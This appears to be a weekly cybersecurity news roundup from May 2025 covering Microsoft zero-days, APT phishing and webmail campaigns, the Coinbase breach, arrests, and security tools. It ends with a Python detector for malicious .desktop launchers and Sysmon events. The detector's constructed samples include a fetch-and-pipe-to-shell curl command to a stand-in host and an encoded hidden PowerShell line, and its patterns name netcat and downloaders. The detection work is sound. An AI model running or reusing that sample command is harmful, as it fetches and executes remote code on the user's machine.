May 19, 2025 Ravie Lakshmanan Threat Intelligence / Cybersecurity
Cybersecurity leaders aren't just dealing with attacks—they're also protecting trust, keeping systems running, and maintaining their organization's reputation. This week's developments highlight a bigger issue: as we rely more on digital tools, hidden weaknesses can quietly grow.
Just fixing problems isn't enough anymore—resilience needs to be built into everything from the ground up. That means better systems, stronger teams, and clearer visibility across the entire organization. What's showing up now isn't just risk—it's a clear signal that acting fast and making smart choices matters more than being perfect.
Here's what surfaced—and what security teams can't afford to miss.
⚡ Threat of the Week
Microsoft Fixes 5 Actively Exploited 0-Days — Microsoft addressed a total of 78 security flaws in its Patch Tuesday update for May 2025 last week, five of which have come under active exploitation in the wild. The vulnerabilities include CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709. It's currently not known in what context these defects have been exploited, who's behind them, and who was targeted in these attacks.
🔔 Top News
Marbled Dust Exploits Output Messenger 0-Day — Microsoft revealed that a Türkiye-affiliated threat actor codenamed Marbled Dust exploited, as a zero-day, a security flaw in an Indian enterprise communication platform called Output Messenger as part of a cyber espionage campaign ongoing since April 2024. The attacks, the company said, are associated with the Kurdish military operating in Iraq. The attacks exploited CVE-2025-27920, a directory traversal vulnerability affecting version 2.0.62 that allows remote attackers to access or execute arbitrary files. It was addressed in December 2024.
Konni APT Focuses on Ukraine in New Phishing Campaign — The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating that the threat actor's targeting extends beyond Russia amidst the ongoing Russo-Ukrainian war. Proofpoint, which disclosed details of the activity, said the objective of the attacks is to collect intelligence on the "trajectory of the Russian invasion." The attack chains entail the use of phishing emails that impersonate a fictitious senior fellow at a non-existent think tank, tricking recipients into visiting credential harvesting pages or downloading malware that can conduct extensive reconnaissance of the compromised machines.
Coinbase Discloses Data Breach — Cryptocurrency giant Coinbase disclosed that unknown cyber actors broke into its systems and stole account data for a small subset of its customers. The actors bribed its customer support agents based in India to obtain a list of customers, who were then approached as part of a social engineering attack to transfer their digital assets to a wallet under the threat actor's control. The attackers also unsuccessfully attempted to extort the company for $20 million on May 11, 2025, by claiming to have information about certain customer accounts as well as internal documents. The compromised agents have since been terminated. While no passwords, private keys, or funds were exposed, the attackers made away with some amount of personal information, including names, addresses, phone numbers, email addresses, government ID images, and account balances. Coinbase did not disclose how many of its customers fell for the scam. Besides voluntarily reimbursing retail customers who were duped into sending cryptocurrency to scammers, Coinbase is offering a $20 million reward to anyone who can help identify and bring down the perpetrators of the cyber attack.
APT28 Behind Attacks Targeting Webmail Services — APT28, a hacking group linked to Russia's Main Intelligence Directorate (GRU), has been targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities. The attacks, ongoing since at least 2023, targeted governmental entities and defense companies in Eastern Europe, although governments in Africa, Europe, and South America were also singled out. The victims in 2024 alone included officials from regional national governments in Ukraine, Greece, Cameroon and Serbia, military officials in Ukraine and Ecuador, and employees of defense contracting companies in Ukraine, Romania and Bulgaria. The group's spear-phishing campaign used fake headlines mimicking prominent Ukrainian news outlets like the Kyiv Post about the Russia-Ukraine war, likely in an attempt to entice targets into opening the messages using the affected webmail clients. Those who opened the email messages using the affected webmail clients were served, via the XSS flaws, a custom JavaScript payload capable of exfiltrating contacts and email data from their mailboxes. One of the payloads could steal passwords and two-factor authentication codes, allowing the attackers to bypass account protections. The malware is also designed to harvest the email credentials, either by tricking the browser or password manager into pasting these credentials into a hidden form or by getting the user to log out, whereupon they were served a bogus login page.
Earth Ammit Breaches Drone Supply Chains to Target Taiwan and South Korea — The threat actor known as Earth Ammit targeted a broader range of organizations than just Taiwanese drone manufacturers, as initially assumed. While the set of attacks was believed to be confined to drone manufacturers in Taiwan, a subsequent analysis has uncovered that the campaign is broader and more sustained in scope than previously thought, hitting the heavy industry, media, technology, software services, healthcare, satellite, and military-adjacent supply chains, and payment service providers in both South Korea and Taiwan. The attacks targeted software vendors and service providers as a way to reach their desired victims, who were the vendors' downstream customers. "Earth Ammit's strategy centered around infiltrating the upstream segment of the drone supply chain. By compromising trusted vendors, the group positioned itself to target downstream customers – demonstrating how supply chain attacks can ripple out and cause broad, global consequences," Trend Micro noted. "Earth Ammit's long-term goal is to compromise trusted networks via supply chain attacks, allowing them to target high-value entities downstream and amplify their reach."
🔥 Trending CVEs
Attackers love software vulnerabilities—they're easy doors into your systems. Every week brings fresh flaws, and waiting too long to patch can turn a minor oversight into a major breach. Below are this week's critical vulnerabilities you need to know about. Take a look, update your software promptly, and keep attackers locked out.
This week's list includes — CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, CVE-2025-32709 (Microsoft Windows), CVE-2025-42999 (SAP NetWeaver), CVE-2024-11182 (MDaemon), CVE-2025-4664 (Google Chrome), CVE-2025-4632 (Samsung MagicINFO 9 Server), CVE-2025-32756 (Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera), CVE-2025-4427, CVE-2025-4428 (Ivanti Endpoint Manager Mobile), CVE-2025-3462, CVE-2025-3463 (ASUS DriverHub), CVE-2025-47729 (TeleMessage TM SGNL), CVE-2025-31644 (F5 BIG-IP), CVE-2025-22249 (VMware Aria Automation), CVE-2025-27696 (Apache Superset), CVE-2025-4317 (TheGem WordPress theme), CVE-2025-23166 (Node.js), CVE-2025-47884 (Jenkins OpenID Connect Provider Plugin), CVE-2025-47889 (Jenkins WSO2 Oauth Plugin), CVE-2025-4802 (Linux glibc), and CVE-2025-47539 (Eventin plugin).
📰 Around the Cyber World
Attackers Leverage PyInstaller to Drop Infostealers on Macs — Attackers are using PyInstaller to deploy information stealers on macOS systems. These ad-hoc signed samples bundle Python code into Mach-O executables using PyInstaller, allowing them to run without requiring Python to be installed or meeting version compatibility requirements. "As infostealers continue to become more prevalent in the macOS threat landscape, threat actors will continue the search for new ways to distribute them," Jamf said. "While the use of PyInstaller to package malware is not uncommon, this marks the first time we have observed it being used to deploy an infostealer on macOS."
Kosovo National Extradited to the U.S. for Running BlackDB.cc — A 33-year-old Kosovo national named Liridon Masurica has been extradited to the United States to face charges of running an online cybercrime marketplace active since 2018. He has been charged with five counts of fraudulent use of unauthorized access devices and one count of conspiracy to commit access device fraud. If convicted on all counts, Masurica faces a maximum penalty of 55 years in federal prison. He was taken into custody by authorities in Kosovo on December 12, 2024. Masurica is alleged to be the lead administrator of BlackDB.cc from 2018 to the present. "BlackDB.cc illegally offered for sale compromised account and server credentials, credit card information, and other personally identifiable information of individuals primarily located in the United States," the Justice Department said. "Once purchased, cybercriminals used the items bought on BlackDB.cc to facilitate a wide range of criminal activity, including tax fraud, credit card fraud, and identity theft."
Former BreachForums Admin to Pay $700k in Healthcare Breach — Conor Brian Fitzpatrick, aka Pompompurin, a former administrator of the BreachForums cybercrime forum, will forfeit roughly $700,000 in a civil lawsuit settlement related to Nonstop Health, a health insurance company whose customer data was posted for sale on the forum in 2023. Fitzpatrick was sentenced to time served last year, but he went on to violate the terms of his release. He's set to be resentenced next month.
Tor Announces Oniux for Kernel-Level Tor Isolation — The Tor project has announced a new command-line utility called oniux that provides Tor network isolation for third-party applications using Linux namespaces. This effectively creates a fully isolated network environment for each application, preventing data leaks even if the app is malicious or misconfigured. "Built on Arti, and onionmasq, oniux drop-ships any Linux program into its own network namespace to route it through Tor and strips away the potential for data leaks," the Tor project said. "If your work, activism, or research demands rock-solid traffic isolation, oniux delivers it."
DoJ Charges 12 More in RICO Conspiracy — The U.S. Department of Justice announced charges against 12 more people for their alleged involvement in a cyber-enabled racketeering conspiracy throughout the United States and abroad that netted them more than $263 million. Several of these individuals are said to have been arrested in the U.S., with two others residing in Dubai. They face charges related to RICO conspiracy, conspiracy to commit wire fraud, money laundering, and obstruction of justice. The defendants are also accused of stealing over $230 million in cryptocurrency from a victim in Washington D.C. "The enterprise began no later than October 2023 and continued through March 2025," the Justice Department said. "It grew from friendships developed on online gaming platforms. Members of the enterprise held different responsibilities. The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware digital currency wallets." The attacks involved database hackers breaking into websites and servers to obtain cryptocurrency-related databases or purchasing databases on the dark web. The miscreants then determined the most valuable targets and cold-called them, using social engineering to convince them their accounts were the subject of cyber attacks and that they were helping them take steps to secure their accounts. The end goal of these attacks was to siphon the cryptocurrency assets, which were then laundered and converted into fiat U.S. currency in the form of bulk cash or wire transfers. The money was then used to fund a lavish lifestyle for the defendants.
"Following his arrest in September 2024 and continuing while in pretrial detention, Lam is alleged to have continued working with members of the enterprise to pass and receive instructions, collect stolen cryptocurrency, and have enterprise members buy luxury Hermes Birkin bags and hand-deliver them to his girlfriend in Miami, Florida," the agency said.
ENISA Launches EUVD Vulnerability Database — The European Union launched a new vulnerability database called the European Vulnerability Database (EUVD) to provide aggregated information regarding security issues affecting various products and services. "The database provides aggregated, reliable, and actionable information such as mitigation measures and exploitation status on cybersecurity vulnerabilities affecting Information and Communication Technology (ICT) products and services," the European Union Agency for Cybersecurity (ENISA) said. The development comes in the wake of uncertainty over MITRE's CVE program in the U.S., after which the U.S. Cybersecurity and Infrastructure Security Agency (CISA) stepped in at the last minute to extend its contract with MITRE for another 11 months to keep the initiative running.
3 Info Stealers Detected in the Wild — Cybersecurity researchers have uncovered the workings of three different information stealer malware families, codenamed DarkCloud Stealer, Chihuahua Stealer, and Pentagon Stealer, that are capable of extracting sensitive data from compromised hosts. While DarkCloud has been advertised on hacking forums as early as January 2023, attacks distributing the malware have primarily focused on government organizations since late January 2025. DarkCloud is distributed as AutoIt payloads via phishing emails using PDF purchase order lures that display a message claiming the victim's Adobe Flash Player is outdated. Chihuahua Stealer, on the other hand, is a .NET-based malware that employs an obfuscated PowerShell script shared through a malicious Google Drive document. First discovered in March 2025, Pentagon Stealer uses Golang to realize its goals. However, a Python variant of the same stealer was detected at least a year prior, when it was propagated via fake Python packages uploaded to the PyPI repository.
Kaspersky Outlines Malware Trends for Industrial Systems in Q1 2025 — Kaspersky revealed that the percentage of ICS computers on which malicious objects were blocked in Q1 2025 remained unchanged from Q4 2024 at 21.9%. "Regionally, the percentage of ICS computers on which malicious objects were blocked ranged from 10.7% in Northern Europe to 29.6% in Africa," the Russian security company said. "The biometrics sector led the ranking of the industries and OT infrastructures surveyed in this report in terms of the percentage of ICS computers on which malicious objects were blocked." The primary categories of detected malicious objects included malicious scripts and phishing pages, denylisted internet resources, backdoors, and keyloggers.
Linux Flaws Surge by 967% in 2024 — The number of newly discovered Linux and macOS vulnerabilities increased dramatically in 2024, rising by 967% and 95%, respectively. The year was also marked by a 96% jump in exploited vulnerabilities, from 101 in 2023 to 198 in 2024, and an unprecedented 37% rise in critical flaws across key enterprise applications. "The total number of software vulnerabilities grew by 61% YoY in 2024, with critical vulnerabilities rising by 37.1% – a significant expansion of the global attack surface and exposure of critical weaknesses across diverse software categories," Action1 said. "Exploits spiked 657% in browsers and 433% in Microsoft Office, with Chrome leading all products in known attacks." But in a bit of good news, there was a decrease in remote code execution vulnerabilities for Linux (-85% YoY) and macOS (-44% YoY).
Europol Announces Takedown of Fake Trading Platform — Law enforcement authorities have disrupted an organized crime group that's assessed to be responsible for defrauding more than 100 victims of over €3 million ($3.4 million) through a fake online investment platform. The effort, a joint exercise carried out by Germany, Albania, Cyprus, and Israel, has also led to the arrest of a suspect in Cyprus. "The criminal network lured victims with the promise of high returns on investments through a fraudulent online trading platform," Europol said. "After the victims made initial smaller deposits, they were pressured to invest larger amounts of money, manipulated by fake charts showing fabricated profits. Criminals posing as brokers used psychological tactics to convince the victims to transfer substantial funds, which were never invested but directly pocketed by the group." Two other suspects were previously arrested in Latvia in September 2022 as part of the multi-year probe into the criminal network.
New "defendnot" Tool Can Disable Windows Defender — A security researcher who goes by the online alias es3n1n has released a tool called "defendnot" that can disable Windows Defender through a little-known API. "There's a WSC (Windows Security Center) service in Windows which is used by antiviruses to let Windows know that there's some other antivirus in the hood and it should disable Windows Defender," the researcher explained. "This WSC API is undocumented and furthermore requires people to sign an NDA with Microsoft to get its documentation."
Rogue Communication Devices Found in Some Chinese Solar Power Inverters — Reuters reported that U.S. energy officials are reassessing the risk posed by Chinese-made solar power inverters after unexplained communication equipment was found inside some of them. The rogue components are designed to provide additional, undocumented communication channels that could allow firewalls to be circumvented remotely, according to two people familiar with the matter. This could then be used to switch off inverters remotely or change their settings, enabling bad actors to destabilize power grids, damage energy infrastructure, and trigger widespread blackouts. Undocumented communication devices, including cellular radios, have also been found in some batteries from multiple Chinese suppliers, the report added.
Israel Arrests Suspect Behind 2022 Nomad Bridge Crypto Hack — Israeli authorities have arrested and approved the extradition of Russian-Israeli dual national Alexander Gurevich over his alleged involvement in the Nomad Bridge hack in August 2022 that allowed hackers to steal $190 million. Gurevich is said to have conspired with others to execute an exploit for the bridge's Replica smart contract and launder the resulting proceeds through a sophisticated, multi-layered operation involving privacy coins, mixers, and offshore financial entities. "Gurevich played a central role in laundering a portion of the stolen funds. Blockchain analysis shows that wallets linked to Gurevich received stolen assets within hours of the bridge breach and began fragmenting the funds across multiple blockchains," TRM Labs said. "He then employed a classic mixer stack: moving assets through Tornado Cash on Ethereum, then converting ETH to privacy coins such as Monero (XMR) and Dash."
Using V8 Browser Exploits to Bypass WDAC — Researchers have uncovered a sophisticated technique that leverages vulnerable versions of the V8 JavaScript engine to bypass Windows Defender Application Control (WDAC). "The attack scenario is a familiar one: bring along a vulnerable but trusted binary, and abuse the fact that it's trusted to gain a foothold on the system," IBM X-Force said. "In this case, we use a trusted Electron application with a vulnerable version of V8, replacing main.js with a V8 exploit that executes stage 2 as the payload, and voila, we have native shellcode execution. If the exploited application is whitelisted/signed by a trusted entity (such as Microsoft) and would normally be allowed to run under the employed WDAC policy, it can be used as a vessel for the malicious payload." The technique builds upon previous findings that make it possible to sidestep WDAC policies by backdooring trusted Electron applications. Last month, CerberSec detailed another method that employs WinDbg Preview to get around WDAC policies.
🎥 Cybersecurity Webinars
DevSecOps Is Broken — This Fix Connects Code to Cloud to SOC
Modern applications don't live in one place—they span code, cloud, and runtime. Yet security is still siloed. This webinar shows why securing just the code isn't enough. You'll learn how unifying AppSec, cloud, and SOC teams can close critical gaps, reduce response times, and stop attacks before they spread. If you're still treating dev, infra, and operations as separate problems, it's time to rethink.
🔧 Cybersecurity Tools
Qtap → It's a lightweight eBPF tool for Linux that shows what data is being sent and received—before or after encryption—without changing your apps or adding proxies. It runs with minimal overhead and captures full context like process, user, and container details. Useful for auditing, debugging, or analyzing app behavior when source code isn't available.
Checkov → It's a fast, open-source tool that scans infrastructure-as-code and container packages for misconfigurations, exposed secrets, and known vulnerabilities. It supports Terraform, Kubernetes, Docker, and more—using built-in security policies and Sigma-style rules to catch issues early in the development process.
TrailAlerts → It's a lightweight, serverless AWS-native tool that gives you full control over CloudTrail detections using Sigma rules—without needing a SIEM. It's ideal for teams who want to write, version, and manage their own alert logic as code, but find CloudWatch rules too limited or complex. Built entirely on AWS services like Lambda, S3, and DynamoDB, TrailAlerts lets you detect suspicious activity, correlate events, and send alerts through SNS or SES—without managing infrastructure or paying for unused capacity.
🔒 Tip of the Week
Catch Hidden Threats in Files Users Trust Too Much → Hackers are using a quiet but dangerous trick: hiding malicious code inside files that look safe — like desktop shortcuts, installer files, or web links. These aren't classic malware files. Instead, they run trusted apps like PowerShell or curl in the background, using basic user actions (like opening a file) to silently infect systems. These attacks often go undetected because the files seem harmless, and no exploits are used — just misuse of normal features.
To detect this, focus on behavior. For example, .desktop files on Linux that run hidden shell commands, .lnk files on Windows launching PowerShell or remote scripts, or macOS .app bundles silently calling terminal tools. These aren't rare anymore — attackers know defenders often ignore these paths. They're especially dangerous because they don't need admin rights and are easy to hide in shared folders or phishing links.
You can spot these threats using free tools and simple rules. On Windows, use Sysmon and Sigma rules to alert on .lnk files starting PowerShell or suspicious child processes from explorer.exe. On Linux or macOS, use grep or find to scan .desktop and .plist files for odd execution patterns. To test your defenses, simulate these attack paths using MITRE CALDERA — it's free and lets you safely model real-world attacker behavior. Focusing on these overlooked execution paths can close a major gap attackers rely on every day.
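The two checks the tip recommends, written out as an added example (not code from the original article or from any of the tools it names): a scanner for Linux .desktop launchers whose Exec line hands off to a shell, downloader or inline interpreter, and a heuristic over Sysmon Event ID 1 (ProcessCreate) records for explorer.exe spawning a script host with a hidden window or encoded command. The indicator patterns, the sample .desktop files and the Sysmon-style events are all constructed for this example; the field names ParentImage, Image and CommandLine are the ones Sysmon uses for process-creation events, and you would feed real events or real files in place of the samples.

```python
"""Flag launcher files and process-creation events that abuse trusted tools
(shell, curl, PowerShell) from files users tend to trust. Example code."""
import configparser
import re
from typing import Dict, List

# Constructed indicators of living-off-the-land execution hidden behind a
# "safe" launcher. Tune to your environment before using in production.
SUSPICIOUS_EXEC = re.compile(
    r"\b(sh|bash|zsh|dash)\s+-c\b"      # inline shell one-liner
    r"|\b(curl|wget)\b"                  # download helper
    r"|\bbase64\s+(-d|--decode)\b"       # decode-then-run staging
    r"|\bpython3?\s+-c\b"                # inline interpreter code
    r"|\b(nc|ncat|socat)\b",             # raw network tools
    re.IGNORECASE,
)


def scan_desktop_entry(text: str) -> List[str]:
    """Return the reasons a .desktop file looks suspicious (empty = clean)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return ["no [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    reasons: List[str] = []
    exec_line = entry.get("Exec", "")
    if SUSPICIOUS_EXEC.search(exec_line):
        reasons.append(f"Exec invokes shell/downloader: {exec_line}")
    # A launcher that hides its terminal while running an inline command
    if entry.get("Terminal", "").lower() == "false" and re.search(r"\s-c\b", exec_line):
        reasons.append("inline command with Terminal=false")
    # Display name mimics a document while Exec runs arbitrary code
    if re.search(r"\.(pdf|docx?|xlsx?)\b", entry.get("Name", ""), re.IGNORECASE):
        reasons.append("name mimics a document")
    return reasons


def is_suspicious_process_event(event: Dict[str, str]) -> bool:
    """Sysmon Event ID 1 heuristic: explorer.exe (what runs a double-clicked
    .lnk) spawning a script host with a hidden window, encoded command, or
    remote download in its command line."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    script_hosts = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe",
                    "\\mshta.exe", "\\wscript.exe", "\\cscript.exe")
    from_explorer = parent.endswith("\\explorer.exe")
    is_script_host = image.endswith(script_hosts)
    hidden_or_remote = any(tok in cmd for tok in (
        "-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
        "http://", "https://", "downloadstring", "iex"))
    return from_explorer and is_script_host and hidden_or_remote


# Constructed samples: one ordinary launcher, one document-lookalike launcher.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Terminal=false
"""

MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Invoice_2025.pdf
Icon=application-pdf
Exec=sh -c "curl -s http://files.example.invalid/s | sh"
Terminal=false
"""

# Constructed Sysmon-style ProcessCreate events (example.invalid paths/values).
SYSMON_EVENTS = [
    {"EventID": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc SQBFAFgA..."},
    {"EventID": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": '"notepad++.exe" C:\\Users\\a\\notes.txt'},
    {"EventID": "1", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def triage() -> Dict[str, object]:
    """Run both checks over the constructed samples and return the findings."""
    return {
        "benign_desktop": scan_desktop_entry(BENIGN_DESKTOP),
        "malicious_desktop": scan_desktop_entry(MALICIOUS_DESKTOP),
        "flagged_events": [i for i, e in enumerate(SYSMON_EVENTS)
                           if is_suspicious_process_event(e)],
    }


if __name__ == "__main__":
    for name, finding in triage().items():
        print(f"{name}: {finding}")
```

Only the first Sysmon event is flagged: the third is also PowerShell, but its parent is cmd.exe and it runs a plain script file, which is what keeps the rule from firing on routine administration. The .desktop scanner is deliberately narrow as well; a launcher that runs its own binary with `%U` passes, while the lookalike invoice is caught on three independent signals, so a single missed pattern does not make the file invisible.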
Conclusion
The headlines may be over, but the work isn't. Whether it's rechecking assumptions, prioritizing patches, or updating your response playbooks, the right next step is rarely dramatic—but always decisive. Choose one, and move with intent.